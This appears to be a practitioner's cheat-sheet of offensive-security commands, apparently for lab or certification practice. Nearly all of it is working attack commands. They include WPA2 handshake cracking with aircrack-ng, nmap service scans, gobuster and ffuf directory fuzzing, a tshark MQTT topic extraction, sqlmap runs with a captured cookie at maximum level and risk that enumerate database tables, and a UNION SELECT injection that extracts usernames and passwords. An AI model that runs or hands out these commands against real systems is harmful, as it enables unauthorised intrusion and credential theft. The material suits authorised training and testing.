aircrack-ng -a2 -b 22:7F:AC:6D:E6:8B -w /home/attacker/Desktop/Wordlist/password.txt '/home/attacker/Desktop/Sample Captures/WPA2crack-01.cap'

sudo tee /etc/apt/sources.list > /dev/null <<EOF
deb https://deb.parrotsec.org/parrot rolling main contrib non-free
deb https://deb.parrotsec.org/parrot rolling-security main contrib non-free
EOF

sudo apt update
sudo apt install python3-pip chromium-driver -y
pip3 install selenium

nmap -iL live-hosts.txt -p 143,993 --script=banner -sV -oN mercury-scan.txt

# s6
for ip in $(grep Up live-hosts.txt | awk '{print $2}'); do
    echo "[*] Scanning $ip"
    nmap -sV -p 22,2222,23,21,80,443,8080,31337 $ip
done

gobuster dir -u http://192.168.44.32:8080/DVWA/SecureWeb/prod/ -w /usr/share/wordlists/dirb/common.txt -x txt,php,b64 --no-error

tshark -r /home/attacker/Documents/IoT\ Traffic\ Capture.pcapng -Y "mqtt.msgtype == 3" -T fields -e mqtt.topic

ffuf -u http://192.168.44.40/FUZZ.php?id=1 -w /usr/share/wordlists/dirb/common.txt -e .php

sqlmap -r /home/attacker/Documents/burp_request.txt -p id -D devilcorp --tables --batch

document.body.innerText.match(/\b\d\*[a-zA-Z]\*[a-zA-Z]\b/)

txtsearch=asdf' UNION SELECT NULL, username, password FROM users WHERE username='Matthew'--

sqlmap -u "http://cinema.cehorg.com/search.aspx" \
--data="txtsearch=asdf&form_titles=0" \
--cookie="mscope=KAp/1eKUZTg=" \
--level=5 --risk=3 --technique=U --batch

python -c "import hashlib; print(hashlib.sha224(open('C:\\Users\\Administrator\\Documents\\Ghostware','rb').read()).hexdigest())"
